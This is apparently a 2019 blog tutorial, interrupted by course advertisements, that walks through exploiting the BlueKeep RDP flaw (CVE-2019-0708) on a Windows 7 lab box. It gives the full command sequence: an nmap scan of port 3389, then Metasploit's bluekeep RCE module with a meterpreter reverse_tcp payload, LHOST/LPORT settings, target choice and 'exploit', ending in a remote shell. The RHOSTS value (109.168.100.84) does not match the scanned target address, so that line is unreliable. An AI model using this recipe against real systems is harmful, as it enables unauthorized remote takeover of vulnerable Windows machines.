BlueKeep – Exploit Windows (RDP Vulnerability) Remotely

Remote desktop protocol (RDP) is a secure network communications protocol designed for remote management, as well as for remote access to virtual desktops, applications and an RDP terminal server.

RDP allows network administrators to remotely diagnose and resolve problems individual subscribers encounter. RDP is available for most versions of the Windows operating system. RDP for Apple macOS is also an option. An open source version is available, as well.

REGISTER TODAY FOR YOUR KUBERNETES FOR DEVELOPERS (LFD259) COURSE AND CKAD CERTIFICATION TODAY! $499!    $299 now!!

But RDP has a vulnerability on Windows7, so we will be demonstrating that today. So let’s open up a command prompt and get started.

RDP runs on port 3389 TCP, so first we will need to see if the device we are attacking uses this protocol. For this we will use nmap and specify port 3389 in our scan. All we will need is the IP of the Windows7 machine. Ours in this case is 192.168.100.84.

nmap -sV -p 3389 192.168.100.84

The command above will scan, looking specifically to see if port 3389 is in use, we can see the the -p flag denotes the port. So let’s see the results of the scan.

bk1.PNG

As we can see, our Windows7 box does indeed use port 3389. Now let’s move on the the exploit. Firstly, we will need to open up Metasploit.

msfconsole

Next we will search for the exploit we are looking for, in our case, Bluekeep.

search bluekeep

bk2.PNG

$299 WILL ENROLL YOU IN OUR SELF PACED COURSE – LFS205 – ADMINISTERING LINUX ON AZURE!

So here we can see two exploits, both for Bluekeep, but we will only need the bottom one. So let’s use that.

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

bk3

Once we can see the exploit in red, we know that we are now using it. So let’s look for some more information on this exploit.

info

bk4

So it gives us an explanation as to how this exploit is able to improperly handle binds to get code execution. Perfect. Next we will need to tell Metasploit the IP of the target Windows7 machine.

$199 ENROLLS YOU INTO OUR SELF PACED COURSE – LFS264 – OPNFV FUNDAMENTALS!

set RHOSTS 109.168.100.84

bk5.PNG

Once that s set up we can go ahead and give it the payload that we want to use, along with the exploit, to get a reverse TCP shell.

set payload windows/x64/meterpreter/reverse_tcp

So we are specifying the Windows operating system, the 64 bit architecture and asking for a TCP reverse shell with a Meterpreter session. A couple more things we need to do is to give Metasploit our attacking machine’s IP and port number to listen on.

set LHOST 192.168.100.237

set LPORT 4444

bk7

We are specifying the port 4444 to listen on simply because we know there is no other service running on that port. So now we want to see what target option Metasploit gives us.

$299 REGISTERS YOU FOR OUR NEWEST SELF PACED COURSE! LFD201 – INTRODUCTION TO OPEN SOURCE DEVELOPMENT, GIT, AND LINUX!

show targets

bk8

We already know from our nmap scan earlier that the Windows7 box is running on VMWare, Virtualbox to be precise, so we will choose number 2 in the list.

set target 2

bk9

If you have all that set up, the final step is to exploit the target machine.

exploit

bk10.PNG

We can see that the exploit is trying to work. We can also see that it tells us that the target is vulnerable. This exploit should just take a minute for the code to execute.

bk11

BOOM!! we have a Meterpreter shell from the target machine!! This is how Bluekeep works.

Thanks for reading guys, please return for more posts like this and give us suggestions as to what you’d like us to post about.

Also, don’t forget to subscribe, share and like, thanks in advance!!

Zxer197 2019-10-10

DAL

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.